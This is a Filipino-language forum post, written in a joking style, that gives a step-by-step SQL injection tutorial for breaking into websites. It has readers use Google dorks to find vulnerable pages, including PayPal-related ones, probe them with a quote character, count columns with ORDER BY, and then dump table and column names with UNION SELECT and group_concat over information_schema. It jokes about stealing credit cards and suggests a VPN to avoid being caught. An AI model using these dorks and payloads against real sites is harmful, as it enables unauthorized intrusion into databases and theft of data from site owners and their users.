remobaview
Forum Veteran
- Joined
- Feb 9, 2016
- Posts
- 2,084
- Reaction
- 2,817
- Points
- 755
- Age
- 28
Ok! Mga TS Taga Salamat Oras na para matutong Magnakaw ng Credit Card
Biro lang , walang credit card na mawawala ngayon.
Para ito sa mga IT STUDENTS at IT Enthusiast na gusto matuto mag Hàck .
.
Ang I hahàck natin ngayon ay mga WEBSITES the Swagger Style.
.
Ang Tawag Dito ay SQL Injection .
.
Ano ang Sql Injection ? Hindi ko rin alam , nag cocopy paste lang ako sa google para mag ka likes .
Aahahahha .
.
Mahirap ba ito ? Hindi lalo na kung swagger ka , swaggidi swaggeder swag .
.
Mga Kailangan .
.
Android Phone o Iphone .
.
Internet , mas maganda kung naka vpn para di ka mahuli swagger ka panaman .
.
Mga Dapat Tandaan
1 . Google Dorks
2. '
3. order by numberangnakalagaydito--
4. UNION SELECT number,number,number,dependesadamingnumber--
5. group_concat(table_name)
6. from information_schema.tables where table_schema=database()--
7. from information_schema.columns where table_name='exampletable'--
8. from exampletable--
.
Eto ang Step .
.
Step 1 .
Open nyo ang Browser sa phone nyo . Chrome .
.
Step 2 . Mag search ng mga website .
Swagger Question : Lahat ba ng website pwede i hàck ?
.
Swagger Answer : Hindi, mga website lang na may sira sa pagkakagawa.
.
Step 3 . Gumamit ng mga Google Dorks .
example : inurl: paypal.php?id=
.
Step 4. You do not have permission to view the full content of this post. Log in or register now. , buksan ang nakitang website .
.
Step 5. Maglagay ng ' sa dulo ng website . You do not have permission to view the full content of this post. Log in or register now.'
.
Step 6. Kapag may lumabas na error msql,error basta kahit anong swagger na error .
Ibig sabihin pwede i Hàck ang website , tawag dun Vulnerable site.
.
Step 7. gamitin ang Order by tanggaln ang '
ganito: You do not have permission to view the full content of this post. Log in or register now. order by 2--
Maglagay ng number , tapos click enter, pag walang error , taasan ang number .
Hanggang sa magka error .
ganito: You do not have permission to view the full content of this post. Log in or register now. order by 5-
May Error . Bawasan ang number .
ganito: You do not have permission to view the full content of this post. Log in or register now. order by 4-
Walang Error . Ibig sabihin hanggang 4 ang number na kailangan .
.
Step 8. UNION Select .
ganito . You do not have permission to view the full content of this post. Log in or register now. union select 1,2,3,4--
maglagay ng - bago ang number sa ?id
tapos ilagay ang number na walang error . pati mga digits bago nun .
.
Wag mo kalimutan I enter swagger ka panaman.
.
Step 9 . May makikita kang number sa screen mo , iyong 2 at 3 .
. mga table yan na may chicks .
.
Step 10. Pumunta sa url . You do not have permission to view the full content of this post. Log in or register now. union select 1,2,3,4--
palitan ang 2 at 3 ng users() .
ganito : You do not have permission to view the full content of this post. Log in or register now. union select 1,users(),users(),4--
pag may error ok lang proceed to next step .
.
Step 11. group concat(table_name).
You do not have permission to view the full content of this post. Log in or register now. union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--
. Kapag tama ang pagkaka copy paste mo na swagger ka .
. May Lalabas na mga Information . Tawag dun mga Tables .
. explanation .
"Kinuha natin ang mga Table name at pinagsamasama(concatenate) mula sa impormasyon sa mga Table sa Database ng Website . "
Oh diba, swaggedi swaggeder swag!
. Lalabas ang mga Table ng Database ng Website .
Step 12. Alam na natin ang mga Table, alamin naman natin mga Column Sa Table .
Lima yan mga Swagger .
1 . Website, 2. Database 3. Table , 4 . Column 5. Row
Sa website may database , sa database may mga table iyong nakikkta nyo na parang Excel , sa table , may column, iyong Vertical sa excel , sa column may Row, iyong horizontal sa excel .
Swagger!
.
Ganito : You do not have permission to view the full content of this post. Log in or register now. union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='tblAboutUs'--
pinalitan natin iyong . group_concat(table_name) ng group_concat(column_name)
pinalitan ang information_schema.tables ng information_schema.columns
pinalitan ang table_schema=database()-- ng table_name='tblAboutUs'--
nilagyan natin ang tblAboutUs ng dalawang '
Last edited: